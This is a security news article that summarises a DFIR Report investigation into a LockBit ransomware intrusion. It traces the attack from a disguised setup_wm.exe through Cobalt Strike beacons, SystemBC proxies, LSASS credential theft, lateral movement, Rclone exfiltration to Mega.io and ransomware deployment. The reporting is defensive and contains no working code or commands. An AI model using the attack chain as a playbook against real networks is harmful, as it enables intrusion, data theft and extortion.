Ddos 
Source: The DFIR Report
A recent investigation by The DFIR Report unveiled a sophisticated ransomware operation leveraging Cobalt Strike beacons and proxy tools like SystemBC and GhostSOCKS to deploy LockBit ransomware, one of today’s most prevalent ransomware variants.
The attack began in late January 2024 when a user inadvertently downloaded a malicious file named setup_wm.exe, disguised as the legitimate Microsoft Windows Media Configuration Utility. Upon execution, the file triggered a Cobalt Strike beacon, initiating outbound connections to command-and-control (C2) servers. Within 30 minutes, the beacon executed domain reconnaissance commands such as nltest to locate domain controllers.
Using elevated permissions, the attackers deployed two proxy tools—SystemBC and GhostSOCKS—to the domain controller. While Windows Defender successfully blocked GhostSOCKS, SystemBC remained active, providing a stable C2 channel. The attackers utilized PowerShell commands to enhance persistence, injected malicious code into trusted processes like WUAUCLT.exe, and extracted credentials from LSASS.
Persistence mechanisms included scheduled tasks and registry run keys. The attackers configured these tasks to maintain the execution of their malicious proxies. “We identified multiple scheduled tasks across several systems within the environment,” noted the report.
Within an hour of the initial breach, the attackers laterally moved to a file server, deploying a new Cobalt Strike beacon linked to a separate C2 server. Remote services and SMB protocols facilitated their movements, allowing the deployment of additional proxy tools. This sophisticated pivoting ensured the attackers could maintain their foothold within the compromised network.
The attackers initially experimented with smaller data exfiltration attempts using tools like Internet Explorer and temporary file-sharing sites. However, they later turned to Rclone for large-scale exfiltration. Early attempts to use FTP servers failed, prompting the attackers to utilize Mega.io for storing stolen data. Over 16 hours, several gigabytes of sensitive information were siphoned off.
Eleven days into the intrusion, the attackers executed their ultimate goal: ransomware deployment. The operation was carefully staged, with the backup server acting as the central hub for launching the LockBit payload. Tools such as PsExec, WMI, and BITSAdmin were used to distribute and execute the ransomware across all accessible Windows hosts.
The final attack achieved a Time to Ransomware (TTR) of 239 hours. Despite encountering errors during execution, the attackers successfully encrypted the network and left ransom notes on the compromised systems, demanding payment for data recovery.
Related Posts:
- Leaked LockBit Tools: Novice Hackers Target Vulnerabilities
- LockBit Imposter: New Ransomware Leverages AWS for Attacks
- LockBit Ransomware: The Hidden Threat in Resume Word Files
- Vulnerable Microsoft SQL Server are being targeted by hackers
- Europol Leads Global Crackdown on LockBit Ransomware Syndicate
Donate